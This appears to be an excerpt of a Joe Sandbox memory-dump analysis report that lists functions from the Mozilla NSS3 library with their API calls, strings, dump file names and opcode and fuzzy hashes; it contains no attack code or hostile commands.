PK11_GetInternalKeySlot.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EA2

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EC3
TlsGetValue.KERNEL32(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C798EF1
PR_Unlock.NSS3 ref: 6C798F20

Strings

b.{l, xrefs: 6C798E96, 6C798F25

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.{l
API String ID: 1978757487-175572528
Opcode ID: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction ID: 8302d60c6188c817c9d6b4ce8d24bdaaa225a8724e1a7c3c6bf5d42597db3298
Opcode Fuzzy Hash: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction Fuzzy Hash: 0D218B74A096059FDB00AF39E688699BBF4FF48318F05456EEC989BB41D730E854CBC2

Function 6C7C8970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C7761C4,?,6C775639,00000000), ref: 6C7C8991
TlsGetValue.KERNEL32(?,?,?,?,?,6C775639,00000000), ref: 6C7C89AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C775639,00000000), ref: 6C7C89C6
PR_WaitCondVar.NSS3 ref: 6C7C89F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C775639,00000000), ref: 6C7C8A0C

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

9Vwl, xrefs: 6C7C8986

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9Vwl
API String ID: 2759447159-3761043575
Opcode ID: c88d6817ad86827ff8281cc3d45aa5d58f70367727d7735716e1482857e2829d
Instruction ID: 1be3f7741014b2b4055b4e965ed2439eef7906352b2cfea319e28bd58fdc1f89
Opcode Fuzzy Hash: c88d6817ad86827ff8281cc3d45aa5d58f70367727d7735716e1482857e2829d
Instruction Fuzzy Hash: 70216DB4A046168FCB10AF78C6881A9BBF4FF06318F11467ADC9897A01E730D894CBD3

Function 6C882C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882CA0
PR_ExitMonitor.NSS3 ref: 6C882CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C882CD1
strdup.MOZGLUE(?), ref: 6C882CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C882D27

Strings

Loaded library %s (static lib), xrefs: 6C882D22

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction ID: d93799ae56fafeeebc771295f26747c40a0f93a597644509fc4fd2bda2b35b0b
Opcode Fuzzy Hash: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction Fuzzy Hash: A51190B16022149FEB309F19EA48A6677B5AB4531DF14893DE80987F42E735ED08CBE1

Function 6C7768E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7768FB
EnterCriticalSection.KERNEL32 ref: 6C776913
PORT_FreeArena_Util.NSS3 ref: 6C77693E
PR_Unlock.NSS3 ref: 6C776946
DeleteCriticalSection.KERNEL32 ref: 6C776951
free.MOZGLUE ref: 6C77695D
PR_Unlock.NSS3 ref: 6C776968

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 86abc382a73da809acfafe8731ea7ff60b39a4ca694c9073e2099dd0ae2a2476
Instruction ID: c48edeef42ceac08dde495531e4c9b7c6c94ef42bb7ff4e6b16c500c4bc6f199
Opcode Fuzzy Hash: 86abc382a73da809acfafe8731ea7ff60b39a4ca694c9073e2099dd0ae2a2476
Instruction Fuzzy Hash: 62114CB56046099FDB10AF79C18856DBBF4BF02248F01497DD899DBA05EB30E598CBE2

Function 6C7D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B
TlsGetValue.KERNEL32(00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1044
free.MOZGLUE(00000000,?,00000800,6C76EF74,00000000), ref: 6C7D1064

Strings

security, xrefs: 6C7D1025

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction ID: 0b5bee2b760fce064967e97bbf062e440c7190f13aecb7cb99f04bcd14d13fa1
Opcode Fuzzy Hash: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction Fuzzy Hash: 1A016670A402909BE7303F3D9E08B563A68BF0276CF020535E80897E52EB70F614EBD1

Function 6C88CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6C88CBEA
PR_NewLock.NSS3 ref: 6C88CBF9

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewCondVar.NSS3(00000000), ref: 6C88CC05

Part of subcall function 6C75BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7621BC), ref: 6C75BB8C

free.MOZGLUE(00000000), ref: 6C88CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6C88CC34
free.MOZGLUE(00000000), ref: 6C88CC41
free.MOZGLUE(00000000), ref: 6C88CC47

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: bc215fc582d064aece9befab78b7669a93766dbd46586e906cfd7312ffba00f9
Instruction ID: e1ad1b476264966ae645bb986706d0d95932cf4a3dd15d5ef9a4f6ac2ebf0028
Opcode Fuzzy Hash: bc215fc582d064aece9befab78b7669a93766dbd46586e906cfd7312ffba00f9
Instruction Fuzzy Hash: D3F028B17022112BE6207B7D9D4999B365D9F456ADF040834ED09C3F03EB11D510C3F2

Function 6C88C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6C801AB6,00000000,?,?,6C8007B9,?), ref: 6C88C9C6
free.MOZGLUE(?,?,6C8007B9,?), ref: 6C88C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C88C9E5
free.MOZGLUE(?), ref: 6C88C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6C88C9F8
free.MOZGLUE(?), ref: 6C88C9FF
free.MOZGLUE(00000000), ref: 6C88CA0B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 8cc431a6e3cb96511b2d08a1b0a350e21686ea4ed1f3863fd5b8ebae0327b79d
Instruction ID: 4f2babe7a4b0b270f8c6e52b29e03e21a3867540728baeaa10dccd61eb087ef2
Opcode Fuzzy Hash: 8cc431a6e3cb96511b2d08a1b0a350e21686ea4ed1f3863fd5b8ebae0327b79d
Instruction Fuzzy Hash: E70162B2600605ABDB20EFB5CC48857B7FCFE496653040536E906C3A01D735F556CBE1

Function 6C812E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C813046

Part of subcall function 6C7FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7E7FFB), ref: 6C81312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C813154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C812E8B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C7FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7E9BFF,?,00000000,00000000), ref: 6C7FF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C7E7FFA), ref: 6C812EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81317B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction ID: ffc28e9e2f587862f9c591e0765fc7ad341e2c3786ab7188ead6bacb55664735
Opcode Fuzzy Hash: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction Fuzzy Hash: E3A1EE71A002199FDB24CF54CC84BEAB7B5EF4A308F048599ED49A7B41E731AE85CF91

Function 6C7CA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ab9e03eba6ba88c491d468c77060dbac69f31571f8846e9260600850b13687
Instruction ID: 02beadbf8843bd32d1861d428a0997e8d12c15c9f8c163865264f6965b2fd057
Opcode Fuzzy Hash: 65ab9e03eba6ba88c491d468c77060dbac69f31571f8846e9260600850b13687
Instruction Fuzzy Hash: 34916E30F0416E4FCB258E288A927DE77B5AF4A32EF1441F9C5999BA01D6318D85CBD3

Function 6C7DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7DED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C7DEDCE

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

free.MOZGLUE(00000000,?,?,?,?,6C7DB04F), ref: 6C7DEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7DEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7DEEFB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction ID: 9056444fcecb2b69c2cf471113fa65ba2cb87755b94924bd09a21a27aa432bed
Opcode Fuzzy Hash: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction Fuzzy Hash: 89815CB5A0020A9FEB15CF55DA85AABB7F5AF88308F15443CE8159B751DB30F814CBA1

Function 6C7DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

PR_Now.NSS3 ref: 6C7DCD35

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

Part of subcall function 6C7C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

PR_GetCurrentThread.NSS3 ref: 6C7DCD54

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Part of subcall function 6C7C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771CCC,00000000,00000000,?,?), ref: 6C7C729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7DCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7DCE2C

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7DCE40

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

Part of subcall function 6C7DCEE0: PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC
Part of subcall function 6C7DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction ID: fa63196bc1c22ed2c91b3c77cd112e20aa7530ae00fd7f5aeaac37e2bcf09cc5
Opcode Fuzzy Hash: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction Fuzzy Hash: F651D4B6A002129FEB10EF69DE45BAA77F9EF48349F260534D84997740EB31F904CB91

Function 6C7D8BA0 Relevance: 9.2, APIs: 6, Instructions: 150memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3 ref: 6C7D8BCD

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaGrow_Util.NSS3(?,?,?), ref: 6C7D8BF9

Part of subcall function 6C7D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D136A
Part of subcall function 6C7D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D137E
Part of subcall function 6C7D1340: PL_ArenaGrow.NSS3(?,6C76F599,?,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?), ref: 6C7D13CF
Part of subcall function 6C7D1340: PR_Unlock.NSS3(?,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D145C

PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7D8C38
PORT_ArenaAlloc_Util.NSS3(?,00000050), ref: 6C7D8C59
PR_GetCurrentThread.NSS3 ref: 6C7D8D33
PR_GetCurrentThread.NSS3 ref: 6C7D8D59

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
